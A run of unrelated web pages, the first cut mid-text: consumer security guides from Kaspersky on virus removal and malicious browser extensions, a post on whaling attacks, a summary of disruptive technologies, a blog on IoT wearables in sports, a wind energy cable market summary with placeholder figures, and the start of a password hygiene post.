- Next, go to your ‘Applications’ folder and drag the file into your ‘Trash’.
- Remember to empty the ‘Trash’ folder afterwards to permanently delete the virus.
- Now make sure your software and apps are up to date to benefit from the latest security patches.
To ensure nothing is missed and to keep your Mac protected, consider installing a running an anti-virus solution if you do not already have one. We recommend comprehensive internet security solution like Kaspersky Total Security.
What is a computer virus?
A computer virus is a type of malware (malicious software) designed to make self-replicate, i.e. to make copies of itself on any drive connected to your computer.
Computer viruses are so-called because, like real viruses, they can self-replicate. Once your computer is infected with a virus, this is how it spreads. When a computer virus infects your computer, it may slow it down and stops it working properly.
There are three main ways that your computer may have become infected with a computer virus.
The first way your computer could become infected from removable media, like a USB stick. If you insert a USB stick or disk into your computer from an unknown source, it may contain a virus.
Sometimes hackers leave infected USB sticks or disks in people’s workplaces, or public places like cafes to spread computer viruses. People sharing USBs may also transfer files from an infected computer to one that isn’t infected.
Another way your computer become infected with a virus is through a download from the internet.
If you are downloading software or apps to your computer, ensure you do so from a trusted source. For example, the Google Play Store or Apple’s App Store. Avoid downloading anything via a pop-up or a website you do not know.
The third way your computer could become infected with a virus is if you open an attachment, or click on a link, in a spam email.
Whenever you receive mail from a sender you do not know or trust, avoid opening it. If you do open it, do not open any attachments or click on any links.
How to tell if your computer has a virus
There are numerous signs to look out for that indicate your computer may have a virus.
Firstly, is your computer slowing down? If everything is taking longer than usual, your computer may have become infected.
Secondly, look out for apps or programs that you do not recognize. If you see an app or a program appear on your computer that you do not remember downloading, exercise caution.
It is a good idea to uninstall any software you do not recognize and then to run a virus scan using anti-virus or internet security software to check for threats. Pop-ups that appear when your browser is closed are a tell tail sign of a virus. If you see these, take immediate action to remove the virus, by following the steps outlined above.
Another sign that your computer may have a virus is if apps or programs on your computer start behaving strangely. If they start crashing for no apparent reason, your computer may have a virus.
Finally, a virus may cause your computer to start overheating. If this happens, investigate whether you have a virus using anti-virus or internet security software.
Can your computer become infected with a virus via email?
Your computer can become infected with a virus via email, but only if you open attachments within a spam email or click on the links contained in them.
Simply receiving a spam email will not infect your computer. Just mark these as spam or junk and ensure they are deleted. Most email providers will automate this (Gmail for example) but if any slip through the net, just mark them as spam yourself and don’t open them.
How to protect your computer from viruses
Here are some key ways that you can protect your computer from viruses:
- Use anti-virus software or a complete internet security solution, like Kaspersky Total Security. For your Android mobile, consider Kaspersky Internet Security for Android.
- Research apps and software by reading user reviews.
- Read developer descriptions before you download apps and software.
- Only download apps and software from trusted sites.
- Check how many downloads apps and software have. The more, the better.
- Check what permissions apps and software ask for. Are these reasonable?
- Never click on unverified links in spam emails, messages or unfamiliar websites.
- Do not open attachments in spam emails.
- Keep software, apps and your operating system updated.
- Use a secure VPN connection for public Wi-Fi, like Kaspersky Secure Connection.
- Never insert unknown USB sticks or disks into your computer.
Why expose yourself to the risk of infection? Protect your computer with Kaspersky Total Security.
Kaspersky Internet Security received two AV-TEST awards for the best performance & protection for an internet security product in 2021. In all tests Kaspersky Internet Security showed outstanding performance and protection against cyberthreats. | <urn:uuid:d201eb21-003f-44cd-ad28-dc995d75b256> | CC-MAIN-2024-38 | https://www.kaspersky.com.au/resource-center/threats/how-to-get-rid-of-a-computer-virus | 2024-09-07T20:07:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00456.warc.gz | en | 0.928369 | 2,141 | 3 | 3 |
Cloud computing is on the list of 12 disruptive technologies that may change the world. According to investopedia.com; Disruptive technology is an innovation that significantly alters the way that consumers, industries, or businesses operate. A disruptive technology sweeps away the systems or habits it replaces because it has attributes that are recognizably superior. Now the question, is cloud computing a disruptive technology?
The McKinsey Global Institute released a research report, announcing the next 12 disruptive technologies that may change lives, businesses, and the global economy.
These technologies are expected to bring economic benefits of US$14 trillion to US$33 trillion in 2025. The research report selects 12 technologies with economic benefits from 100 technologies, and then analyzes the possible applications of these technologies.
Also, it will note the value they can create, and ranks them in terms of economic benefits. The report estimates that global economic output in 2025 will be 100 trillion US dollars.
Let’s see what these Technologies are:
Name: Mobile Internet
The applied technologies include wireless technology, small, low-cost computing and storage equipment, advanced display technology, natural user interface, and advanced but low-cost batteries.
It can be used to improve labor productivity, remote monitoring system, and reduce the cost of treating chronic diseases. It is estimated that the mobile Internet will bring economic benefits of US$3.7 trillion to US$10.8 trillion in 2025.
Second place: Automation of knowledge work
For example, using intelligent software systems to replace humans to handle customer service calls. It is estimated that the technology can bring economic benefits of US$5.2 trillion to US$6.7 trillion.
Third place: Internet of Things
Embedded sensors in objects to monitor the flow of products in the factory.
Fourth place: cloud computing
Manufacturers can provide services through the Internet, and can also enhance the productivity of corporate information technology.
Fifth place: Robotics
In the future, robots will develop more sensitive, dexterous, and intelligent, and can perform tasks that were considered too detailed or uneconomical. If used in medicine, robotic surgery systems can reduce risks, and robotic prostheses can restore limb functions to amputees or the elderly.
Sixth place: Automatic or semi-automatic navigation and driving vehicles
In addition to convenience, it can also avoid serious traffic accidents and save 30,000 to 150,000 lives.
Seventh place: Next-generation genomics
Complete genome sequencing at a fast and low cost, and perform advanced analysis for synthetic biology, which can be used to treat diseases, develop agriculture, and produce high-value substances.
Other technologies ranked eight to twelve include energy storage, 3D printing, stronger and more conductive advanced materials, oil and gas exploration and discovery, and renewable energy.
Big Data is not listed as an independent technology in the report. McKinsey explained that Big Data is the cornerstone of many of these 12 technologies. Including automatic chemical make, robotics, genomics and ultimately big data use.
Topics related to Disruptive Technologies
- disruptive technology examples
- disruptive technology examples 2020
- list of disruptive technologies
- disruptive technology pdf download
- disruptive innovation examples 2021
- emerging and disruptive technologies
- disruptive innovation ppt
- disruptive innovation companies
The report calls for business leaders to continuously update organizational strategies while technology continues to evolve to ensure that the company remains forward-looking and use technology to enhance internal performance.
For enterprises, disruptive technology can reverse the market situation, create brand-new products and services, and bring new business opportunities. Decision makers can use advanced technology to deal with operational difficulties, such as using the Internet of Things to improve infrastructure management, or using the mobile Internet to create new education and training systems to make public services more efficient. | <urn:uuid:59b18153-97f6-43d5-be26-49ba5c065f40> | CC-MAIN-2024-38 | https://hybridcloudtech.com/is-cloud-computing-a-disruptive-technologies-that-may-change-the-world/ | 2024-09-10T07:51:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00256.warc.gz | en | 0.913972 | 778 | 2.921875 | 3 |
A New Era of Sports Innovation
I hope you enjoyed Super Bowl LVIII: it was the longest Super Bowl ever played, and only the second to go into overtime. If you watch NFL football regularly, you'll have noticed an increasing number of smart devices on and around the field. In this blog, we'll dive deeper to find out how IoT technology is deployed in sports. IoT integrates smart devices and sensors throughout the sporting environment, enhancing performance analysis, safety measures, and fan engagement. It provides real-time data and insights that let teams optimize athletes' capabilities and strategies. In both American football and soccer, IoT is woven in through wearable devices and sensors in equipment that monitor athletes' performance and health metrics in real time. This aids in optimizing training, enhancing player safety, and improving game strategies, marking a significant evolution in how sports leverage technology for competitive advantage and player well-being.
The Game Changer: IoT in Enhancing Player Performance and Safety
Wearable devices and IoT technologies, complemented by data analytics, are integral to monitoring athlete health, safety, and performance across all stages of sports involvement: training, in-game play, and post-game recovery through injury rehabilitation. Notable wearables, such as smart mouthguards equipped with accelerometers, detect head impacts and alert coaches and medical staff in real time when a high-magnitude impact occurs, offering vital insight for managing player welfare. Similarly, vests that monitor vital signs such as heart rate and body temperature during physical activity allow training intensity to be adjusted on the basis of live data, preventing overexertion and keeping athletes within healthy physiological limits.
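To make the mouthguard example concrete, here is a minimal sketch of the kind of thresholding logic a device's companion software might run. Everything in it is an illustrative assumption rather than a vendor specification: the `SensorSample` fields, the 80 g alert threshold, and the `check_impact` helper are all hypothetical.

```python
import math
from dataclasses import dataclass

# Illustrative threshold only; real devices use vendor-tuned, calibrated values.
HIGH_IMPACT_THRESHOLD_G = 80.0

@dataclass
class SensorSample:
    """One accelerometer reading from a hypothetical smart mouthguard."""
    player_id: str
    timestamp_ms: int
    ax_g: float  # linear acceleration per axis, in g
    ay_g: float
    az_g: float

def impact_magnitude_g(sample: SensorSample) -> float:
    """Resultant linear acceleration across the three axes."""
    return math.sqrt(sample.ax_g**2 + sample.ay_g**2 + sample.az_g**2)

def check_impact(sample: SensorSample) -> None:
    """Notify the sideline when the resultant acceleration crosses the threshold."""
    magnitude = impact_magnitude_g(sample)
    if magnitude >= HIGH_IMPACT_THRESHOLD_G:
        # A real deployment would push this to medical staff's devices.
        print(f"ALERT: player {sample.player_id} took a {magnitude:.0f} g "
              f"head impact at t={sample.timestamp_ms} ms")

# Example: a hard hit registering on all three axes (~83 g resultant).
check_impact(SensorSample("QB-15", 734_210, ax_g=55.0, ay_g=48.0, az_g=40.0))
```

Production systems also fuse rotational (gyroscope) data and apply filtering, but the shape of the pipeline is the same: sample, compute a resultant, compare against a threshold, notify.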
Injury Prevention and Recovery: Data-Driven Strategies
Data analytics plays a pivotal role in both injury prevention and recovery for athletes. Let’s explore how:
- Injury Prevention:
- Risk Assessment: Data analytics allows teams to identify patterns and risk factors associated with injuries. By analyzing historical data, teams can predict which players are more susceptible to specific injuries.
- Load Management: Monitoring training load, practice intensity, and game participation helps prevent overuse injuries. Analytics help coaches adjust training regimens based on individual player data; a workload-ratio sketch follows this list.
- Biomechanics Analysis: Data from wearable sensors and video analysis provide insights into movement patterns. Coaches can correct faulty mechanics to reduce injury risk.
- Early Warning Systems: Real-time monitoring of player vitals and performance metrics alerts medical staff to potential issues. Quick intervention can prevent minor injuries from escalating.
- Injury Recovery:
- Individualized Rehabilitation Plans: Analytics guide personalized recovery plans. By considering player-specific data (such as muscle strength, flexibility, and recovery rates), medical staff tailor rehab exercises.
- Return-to-Play Decisions: Data-driven assessments determine when an injured player is ready to return. Objective criteria, such as strength benchmarks or movement quality, guide decisions.
- Tracking Progress: Analytics track recovery milestones, ensuring players meet targets. Adjustments can be made based on progress.
- Psychological Well-being: Monitoring mental health data helps address emotional aspects of recovery, promoting overall well-being.
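To make the load-management idea concrete, here is a minimal sketch of the acute:chronic workload ratio, one widely used screening metric. The 7-day and 28-day windows are common defaults, and the ~1.5 flag threshold is an assumption that teams tune against their own data.

```python
def acute_chronic_ratio(daily_loads: list[float]) -> float:
    """Acute:chronic workload ratio from a day-by-day training-load series.

    Acute load = mean of the last 7 days; chronic load = mean of the last 28.
    A ratio climbing well above ~1.5 is often treated as a flag for elevated
    injury risk (the exact threshold is an assumption teams tune themselves).
    """
    if len(daily_loads) < 28:
        raise ValueError("need at least 28 days of load data")
    acute = sum(daily_loads[-7:]) / 7
    chronic = sum(daily_loads[-28:]) / 28
    return acute / chronic

# Three steady weeks followed by a sudden spike in the final week:
loads = [300.0] * 21 + [450.0] * 7
print(round(acute_chronic_ratio(loads), 2))  # 1.33 - trending toward the flag zone
```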
Environmental monitoring across all phases assesses conditions like air quality and temperature, influencing training and performance. Together, IoT technologies and data analytics offer a comprehensive ecosystem for enhancing athlete performance and safety, providing personalized training and recovery plans, enabling immediate injury intervention, and facilitating strategic decisions tailored to each athlete's unique needs.
The Arsenal of IoT: Tools Transforming Athlete Monitoring
The integration of wearable devices and Internet of Things (IoT) technologies in sports represents a significant leap forward in monitoring and enhancing athlete health, safety, and performance. These tools not only provide real-time data during various stages of sports involvement, including training, competition, and recovery, but also play a pivotal role in injury prevention and rehabilitation. Here's an overview of various types of IoT devices used in sports to monitor an athlete's health and performance:
- Smart Mouthguards: Equipped with accelerometers and gyroscopes, smart mouthguards are critical for detecting head impacts. They can measure the force and direction of impacts, providing immediate data to coaches and medical staff to help prevent concussions and manage head injuries effectively.
- Wearable Fitness Trackers: These devices monitor general health metrics such as steps taken, calories burned, and overall activity levels. Advanced models also track sleep patterns and heart rate variability, offering insights into recovery and readiness.
- Smart Vests and Shirts: Embedded with sensors, these garments track vital data like heart rate, body temperature, and respiratory rate during physical activities. This information is crucial for tailoring training programs to individual athletes, preventing overexertion, and ensuring athletes operate within optimal physiological parameters.
- GPS Trackers: Worn by athletes, these devices provide data on speed, distance, and player positioning. This information is invaluable for sports science teams to analyze performance, manage workloads, and develop strategies that optimize athlete output while minimizing injury risk.
- Wearable Biomechanical Devices: These devices measure an athlete's movements, providing data on posture, stride length, and biomechanics during physical activity. Such insights are essential for identifying and correcting inefficiencies or imbalances in an athlete's technique to improve performance and reduce injury risk.
- Smart Footwear: Equipped with pressure sensors and accelerometers, smart shoes offer detailed feedback on an athlete's gait, impact force, and balance. This data can be used to prevent injuries related to poor biomechanics and to design personalized training and rehabilitation programs.
- Sleep Monitoring Devices: While not exclusive to sports, these devices are increasingly used by athletes to track sleep duration, quality, and patterns. Understanding sleep's critical role in recovery, teams use this data to optimize rest schedules, thus enhancing performance and well-being.
- Hydration and Nutrition Trackers: Some wearable devices and smart bottles monitor hydration levels and nutrition, sending reminders and recommendations to ensure athletes maintain optimal hydration and nutrient intake for peak performance and recovery.
- Smart Watches and Bands: Offering a compact and versatile platform, these devices track a wide range of health metrics, including heart rate, oxygen saturation, and stress levels. They are also used for communication and emergency alerts, adding a layer of safety for athletes during training and competitions.
These devices, often interconnected through cloud computing and advanced data analytics platforms, enable a comprehensive and nuanced understanding of an athlete's health, performance, and recovery needs. By leveraging the vast amounts of data generated by these IoT devices, coaches, medical professionals, and athletes themselves can make informed decisions that enhance performance, prevent injuries, and support long-term athlete development.
Spotlight on Smart Mouthguards: The Frontline of Player Safety
Used in sports like football, hockey, and rugby, the smart mouthguard is a cutting-edge integration of technology and sports equipment, designed to enhance athlete safety and health monitoring, particularly in contact sports where head impacts are a significant concern. It leverages advanced sensors, data analytics, and wireless communication technologies to provide a sophisticated solution for real-time monitoring and management of athletes' well-being, prioritizing athlete health while maintaining the integrity of the game. Here are the key capabilities and features of a smart mouthguard:
- Impact Detection: At its core, a smart mouthguard is equipped with accelerometers and gyroscopes that measure the force and direction of head impacts. These sensors can detect sudden movements or collisions, quantifying the magnitude and angle of impact, which are critical data points for assessing potential concussion risks (a simplified detection sketch follows this list).
- Real-time Data Transmission: The data collected by the mouthguard's sensors are transmitted in real-time to a connected device, such as a smartphone or tablet, via Bluetooth or another wireless communication protocol. This enables coaches, medical professionals, and sports scientists to receive instant alerts when a player experiences a significant impact, facilitating immediate assessment and intervention.
- Injury Prevention and Management: By analyzing the accumulated impact data, the smart mouthguard can help identify patterns or trends that may indicate an increased risk of injury. This information can be used to adjust training regimens, modify gameplay strategies, and implement targeted interventions to prevent head injuries.
- Performance Monitoring: Beyond safety, some smart mouthguards are designed to monitor physiological metrics, such as heart rate and body temperature, offering a more comprehensive view of an athlete's condition during training or competition. This data can be valuable for optimizing performance and recovery strategies.
- Customizability and Comfort: Smart mouthguards are typically made from materials that can be custom fitted to the user's teeth, ensuring comfort and minimizing interference with breathing or communication. This personalization is crucial for athlete compliance and the accuracy of the data collected.
- Data Analytics and Reporting: Coupled with sophisticated software platforms, smart mouthguards can provide detailed analytics and reports on the collected data. These insights can inform decisions on player fitness, game strategies, and long-term health monitoring, contributing to a holistic approach to athlete management.
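As a rough illustration of the impact-detection logic above, this sketch computes the peak resultant acceleration from raw 3-axis accelerometer samples and raises an alert above a threshold. The 40 g alert level is an illustrative assumption; commercial systems calibrate their own thresholds.

```python
import math

ALERT_THRESHOLD_G = 40.0  # assumption: illustrative alert level, in g

def peak_impact_g(samples: list[tuple[float, float, float]]) -> float:
    """Peak resultant acceleration (in g) over a burst of (x, y, z) samples."""
    return max(math.sqrt(x * x + y * y + z * z) for x, y, z in samples)

def should_alert(samples: list[tuple[float, float, float]]) -> bool:
    """True if any sample in the burst exceeds the alert threshold."""
    return peak_impact_g(samples) >= ALERT_THRESHOLD_G

# Simulated burst: ordinary play (~1 g) followed by one hard collision.
burst = [(0.1, 0.2, 1.0)] * 10 + [(30.0, 25.0, 35.0)]
print(f"peak = {peak_impact_g(burst):.1f} g, alert = {should_alert(burst)}")
# peak = 52.4 g, alert = True
```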
In summary, a smart mouthguard is a multifunctional device that provides critical insights into athlete safety through real-time impact detection and physiological monitoring. Its capabilities extend from immediate injury response to long-term health and performance management, making it an invaluable tool in modern sports science and athlete care.
Navigating the Future: The Next Generation of Sports Technology
The future of wearable devices in sports is poised for transformative growth, driven by relentless innovation in Internet of Things (IoT) technologies and a deepening understanding of athlete physiology and performance metrics. As these devices become more sophisticated, they will offer even more granular insights into athlete health, extending beyond current capabilities to include advanced biomarker analysis, real-time fatigue assessment, and predictive analytics for injury prevention. Integration with augmented reality (AR) and virtual reality (VR) technologies is likely to enhance training regimes, allowing athletes to simulate competitive environments and scenarios with unprecedented accuracy and realism.
Moreover, the proliferation of AI and machine learning algorithms will enable personalized training and rehabilitation programs that adapt in real time to an athlete’s physical and mental state, optimizing performance while minimizing the risk of injury. Wearable devices will become even more unobtrusive and seamlessly integrated into sports apparel and equipment, ensuring constant monitoring without interfering with the athlete's movements or comfort.
Data privacy and security will become paramount, as the collection of sensitive health data increases, necessitating robust cybersecurity measures to protect athlete information. Collaboration among tech companies, sports organizations, and healthcare providers will likely increase, fostering an ecosystem where data sharing can lead to holistic health and performance insights.
In essence, the future of wearable devices in sports is one where technology not only augments the human experience but also creates a symbiotic relationship between athlete performance and health monitoring, propelling sports into a new era of scientific discovery and athletic achievement.
Conclusion: Towards a Safer, More Engaging Football Experience
As we conclude this exploration into the role of IoT technology in football, it's clear that the intersection of sports and technology is not just a passing trend but a fundamental shift in how we approach athlete performance, health, and safety. The examples of smart mouthguards, wearable fitness trackers, smart vests, GPS trackers, and other IoT devices highlight the depth and breadth of innovation currently reshaping the sports industry. These technologies, by providing real-time data and insights, are not only optimizing training and game strategies but also pioneering new frontiers in injury prevention and recovery.
The evolution of IoT in sports, particularly in football, underscores a broader movement towards data-driven decision-making, personalized athlete management, and enhanced fan engagement. As we look to the future, the potential for further innovation seems limitless. With advancements in AI, machine learning, AR, and VR, the next generation of wearables will likely offer even deeper insights into athlete health and performance, blurring the lines between the physical and digital realms in sports.
This journey through the integration of IoT technologies in football reveals a landscape ripe with opportunities for improving athlete welfare and game integrity. It's a testament to the power of technology to not only enhance the competitive edge but also safeguard the health and well-being of those at the heart of the sport. As we embrace this new era, the continued collaboration among technologists, healthcare professionals, and sports organizations will be crucial in realizing the full potential of IoT in sports. The goal is clear: to harness the power of technology to foster a safer, more dynamic, and more engaging sporting experience for all.
In closing, the role of IoT technology in football is a compelling narrative of innovation, safety, and performance. As we move forward, the commitment to leveraging technology for the betterment of the sport and its athletes will undoubtedly continue to drive the evolution of football, promising a future where the game is not only more exciting to watch but also safer to play. The journey of integrating IoT into sports is just beginning, and its impact will resonate far beyond the football field, setting new standards for how we engage with, understand, and enhance the world of sports.
Each of us has probably installed some kind of browser extension at least once: an ad blocker, an online translator, a spellchecker or something else. However, few of us stop to think: is it safe? Unfortunately, these seemingly innocuous mini-apps can be far more dangerous than they seem at first glance. Let’s see what might go wrong. For this, we shall use data from our experts’ recent report on the most common families of malicious browser extensions.
What are extensions and what do they do?
Let’s start with a basic definition and identify the root of the problem. A browser extension is a plug-in that adds functionality to your browser. For example, extensions can block ads on web pages, take notes, check spelling and much more. For popular browsers there are official extension stores that help you select, compare and install the plug-ins you want. But extensions can also be installed from unofficial sources.
It’s important to note that, for an extension to do its job, it will need permission to read and change the content of web pages you view in the browser. Without this access, it will likely be completely useless.
In the case of Google Chrome, extensions will require the ability to read and change all your data on all websites you visit. Looks like a big deal, right? However, even official stores draw little attention to it.
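For illustration, this is roughly what such a request looks like in a Chrome (Manifest V3) extension manifest. The extension name and script file are placeholders, but `<all_urls>` is the real match pattern that grants a content script access to every page you visit.

```json
{
  "manifest_version": 3,
  "name": "Example Translator",
  "version": "1.0",
  "host_permissions": ["<all_urls>"],
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}
```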
For example, in the official Chrome Web Store, the Privacy practices section of the popular Google Translate extension states that it collects information about location, user activity and website content. But the fact that it needs access to all data from all websites in order to work, isn’t revealed to the user until they’re installing the extension.
Many if not most users probably won’t even read this message and will automatically click Add extension to start using the plugin right away. All of this creates an opportunity for cybercriminals to distribute adware and even malware under the guise of what appears to be harmless extensions.
As for adware extensions, the right to alter the displayed content allows them to show ads on the sites you visit. In this case, the extension creators earn money from users clicking tracked affiliate links to advertisers’ websites. For better targeted ad content, they may also analyze your search queries and other data.
Things are even worse when it comes to malicious extensions. Access to the content of all visited websites allows an attacker to steal card details, cookies and other sensitive information. Let’s look at some examples.
Rogue tools for Office files
In recent years, cybercriminals have been actively spreading malicious WebSearch adware extensions. Members of this family are usually disguised as tools for Office files, for example, for Word-to-PDF conversion.
Most of them even perform their stated function. But then, after installation, they replace the usual browser homepage with a mini-site with a search bar and tracked affiliate links to third-party resources, such as AliExpress or Farfetch.
Once installed, the extension also changes the default search engine to something called search.myway. This allows cybercriminals to save and analyze user search queries and feed them with more relevant links according to their interests.
At present, WebSearch extensions are no longer available in the official Chrome store, but they can still be downloaded from third-party resources.
Adware add-on that won’t leave you be
Members of DealPly, another common family of adware extensions, usually sneak onto people’s computers along with pirated content downloaded from dubious sites. They work in roughly the same way as WebSearch plugins.
DealPly extensions likewise replace the browser homepage with a mini-site containing affiliate links to popular digital platforms, and just like malicious WebSearch extensions, they substitute the default search engine and analyze user search queries to create more tailored ads.
What’s more, members of the DealPly family are extremely difficult to get rid of. Even if the user removes the adware extension, it will reinstall on their device each time the browser is opened.
AddScript hands out unwanted cookies
Extensions from the AddScript family often masquerade as tools for downloading music and videos from social networks, or proxy server managers. However, on top of this functionality, they infect the victim’s device with malicious code. The attackers then use this code to view videos in the background without the user noticing and earn income from boosting the number of views.
Another source of income for cybercriminals is downloading cookies to the victim’s device. Generally speaking, cookies are stored on the user’s device when they visit a website and can be used as a kind of digital marker. In the legitimate scheme, affiliate sites promise to bring customers to a partner’s site: they attract users to their own site with interesting or useful content, store a cookie on the user’s computer, and then send the user to the target site with a link. Using this cookie, the target site understands where the new customer came from and pays the affiliate a fee: sometimes for the redirect itself, sometimes a percentage of any purchase made, and sometimes for a certain action, such as registration.
AddScript operators employ a malicious extension to abuse this scheme. Instead of sending real website visitors to partners, they download multiple cookies onto the infected devices. These cookies serve as markers for the scammers’ partner program, and the AddScript operators receive a fee. In fact, they don’t attract any new customers at all, and their “partner” activity consists of infecting computers with these malicious extensions.
FB Stealer — a cookie thief
FB Stealer, another family of malicious extensions, works differently. Unlike AddScript, members of this family don’t download “extras” to the device, rather they steal important cookies. Here’s how it works.
The FB Stealer extension gets onto users’ devices together with the NullMixer Trojan, which the victims usually pick up when trying to download a hacked software installer. Once installed, the Trojan modifies the file used to store the Chrome browser settings, including information about extensions.
Then, after activation, FB Stealer pretends to be the Google Translate extension, so that users let their guard down. The extension does look very convincing, the only downside for the attackers being the browser warning that the official store contains no information about it.
Members of this family also substitute the browser’s default search engine, but that is not the most unpleasant thing about these extensions. FB Stealer’s main function is to steal session cookies from users of the world’s largest social network, hence the name. These are the same cookies that allow you to bypass logging in every time you visit the site — and they also allow attackers to gain entry without a password. Having hijacked an account in this way, they can then, for example, message the victim’s friends and relatives asking for money.
How to stay safe
Browser extensions are useful tools, but it’s important to treat them with caution and realize they’re not nearly as harmless as one might think. Therefore, we recommend the following security measures:
- Download extensions only from official sources. Remember that this is no watertight security guarantee — malicious extensions do manage to penetrate official stores every now and again. But such platforms usually care about user safety, and eventually manage to remove malicious extensions.
- Don’t install too many extensions and regularly check the list. If you see something that you didn’t install yourself, it’s a bright red flag.
- Use a reliable security solution.
Every business is vulnerable to whaling attacks. Similar to phishing, whaling is a digital attack but with a much larger target. In this article, our IT support team in LA gives you an idea of what whaling attacks are and how you can prevent them.
The Basics of Whaling Attacks
Whaling attacks are a high-level form of spear phishing. In most cases, whaling attacks target C-level employees such as CFOs or COOs. This type of attack centers on a hacker trying to manipulate the individual in question in order to obtain valuable information or money. The term “whaling” refers to the size of the catch: executives are the “whales,” the biggest targets in the organization.
How Whaling Differs from Phishing
Regular phishing is broad-based, while whaling is highly targeted. Phishing centers on spamming large numbers of people through email; if even a few targets respond to the messages, the campaign is considered a success. Phishing attacks often request money from the targeted individuals with the promise of a larger repayment in the future. The criminal takes the money and disappears.
Spear phishing attacks are different in that the attacker pinpoints his or her target, learns about that target and shapes the attack in a strategic manner. The spear phisher often selects an individual in a large company’s IT department, learns about his or her habits, and uses that information to develop a rapport. Social engineering is also used to obtain access to valuable information or transfer funds.
While spear phishing attacks zero in on normal people, whaling attacks go for comparably large fish who have the potential to transfer important trade secrets or a significant amount of money. Whaling attacks often stress the urgency of the matter. A sense of urgency encourages the target to act quickly rather than think things through. Such attacks are often made with the threat of PR exposure or an expensive lawsuit, encouraging the target to fork over the information or money. Other whaling attacks center on impersonating another individual to convince the target to turn over money or information.
Educate Your Team to Prevent Whaling Attacks
Employee education is the best means of preventing whaling attacks. Our IT support team in LA can help you educate your personnel. Detail whaling attack tactics to your team and encourage them to watch out for such attacks. If your C-level employees have social media, those accounts should be set to private. Furthermore, it will help if emails from outside of the organization are flagged for review.
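Most mail platforms offer a built-in transport rule for exactly this. As a rough sketch of the underlying idea, the Python below tags any message whose sender domain is not on an allow-list; the domain name is a placeholder.

```python
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAINS = {"yourcompany.com"}  # assumption: your organization's domains

def tag_external(raw_message: str) -> str:
    """Prepend an [EXTERNAL] tag to the subject of mail from outside domains."""
    msg = message_from_string(raw_message)
    _, sender = parseaddr(msg.get("From", ""))
    domain = sender.rsplit("@", 1)[-1].lower() if "@" in sender else ""
    subject = msg.get("Subject", "")
    if domain not in INTERNAL_DOMAINS and not subject.startswith("[EXTERNAL]"):
        if "Subject" in msg:
            msg.replace_header("Subject", f"[EXTERNAL] {subject}")
        else:
            msg["Subject"] = "[EXTERNAL]"
    return msg.as_string()

sample = "From: ceo@paypa1-support.net\nSubject: Urgent wire transfer\n\nPlease act now."
print(tag_external(sample).splitlines()[1])  # Subject: [EXTERNAL] Urgent wire transfer
```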
Advanced Networks Is On Your Side
Our IT support team in LA is at your service. Whether you are worried about digital attacks or need tech assistance, we are here to help. Reach out to us today to find out more about our services and schedule an initial consultation.
Wind energy cables are normally a combination of high-quality thermosetting rubber insulation and sheathing. These cables need to withstand standard temperature ranges between -40°C and 90°C. Cable requirements depend largely on whether the wind farm is located onshore or offshore. Moreover, wind energy cables are expected to resist different weather conditions such as high winds, salt water, and extreme low or high temperatures. Cables installed within the nacelle and tower of a wind turbine face a severe environment that includes flexing, vibration, electromagnetic interference, high-torsion stress, oil, and ozone. Additionally, wind energy cables need to be resistant to fuel, coolant, oil, corrosive chemicals, and abrasion.
The market is driven mainly by increasing investment in offshore wind turbines. The growing preference for renewable power and the rising requirement to lower carbon emissions are further driving market growth. Additionally, advances in wire technology are a major trend contributing to the market's growth. Rising demand for power is also expected to boost the market: the population is growing rapidly and is expected to grow further, which will increase the demand for power.
Market Classification and Overview
The global wind energy cable market is segmented by product type, application, and region. Based on product type, the market is segmented into low-voltage power cables (600 V) and medium-voltage power cables (15 to 46 kV). On the basis of application, the market is segmented into power transmission, information transfer, and others.
Geographically, the global wind energy cable market is divided into four regions: North America, Europe, Asia Pacific (APAC), and Latin America, Middle East & Africa (LAMEA). North America is expected to see the highest expenditure during the forecast period in terms of upgrade programs and maintenance, repair, and operations (MRO). Rapid urbanization and industrialization in this region are expected to increase energy demand, which in turn drives the market. Europe is expected to hold the major share during the forecast period owing to the growing installation of wind farms, growing investments in offshore wind farms, and the aging of older wind farms. Asia Pacific is expected to account for the second-largest market owing to increasing government support through various subsidies, growing turbine demand from existing and proposed wind farms, and cheap raw material availability. Additionally, LAMEA is estimated to see steady growth owing to limited government support and weaker economic conditions.
Wind Energy Cable Market Report Coverage
| Parameter | Details |
|---|---|
| Market | Wind Energy Cable Market |
| Analysis Period | 2018 - 2030 |
| Base Year | 2021 |
| Forecast Data | 2022 - 2030 |
| Market Stratification | By Product Type, By Application, and By Geography |
| Regional Scope | North America, Europe, Asia-Pacific, Latin America, Middle East and Africa (MEA) |
| Report Coverage | Market Trends, Drivers, Restraints, Porter's Five Forces Analysis, Competitive Analysis, Player Profiling, Value Chain Analysis |
| Key Companies Profiled | Nexans, ABB, General Cable, JDR, Prysmian Group, Parker Scanrope, NSW, LS Cable & System, NKT, Others |
The global wind energy cable market was valued at US$ XX million in 2017 and is projected to reach US$ XX million by 2026, growing at a CAGR of XX% during the forecast period. In this study, 2017 has been considered the base year and 2018 to 2026 the forecast period for estimating the market size for wind energy cable.
The wind energy cable market comprises major players such as Nexans, ABB, General Cable, JDR, Prysmian Group, Parker Scanrope, NSW, LS Cable & System, and NKT.
For instance, in January 2018, Nexans, a global cabling solutions company, acquired a controlling interest in BE CableCon, a Denmark-based manufacturer and supplier of cable kits for wind turbines.
Wind Energy Cable Market, By Product Type
Wind Energy Cable Market, By Application
Wind Energy Cable Market, By Geography
The Middle East & Africa (MEA)
It’s a new year, so it’s time to start counting days until we hear about the first database breach of 2014 to reveal a few million passwords. Before that inevitable compromise happens, take the time to clean up your web accounts and passwords. Don’t be a prisoner to bad habits.
There’s no reason to reuse a password across any account. Partition your password choices so that each account on each web site uses a distinct value. This prevents an attacker who compromises one password (hashed or otherwise) from jumping to another account that uses the same credentials.
At the very least, your email, Facebook, and Twitter accounts should have different passwords. Protecting email is especially important because so many sites rely on it for password resets.
And if you’re still using the password kar120c, I salute your sci-fi dedication but pity your password-creation skills.
Next, consider improving account security through the following steps.
Consider Using OAuth — Passwords vs. Privacy
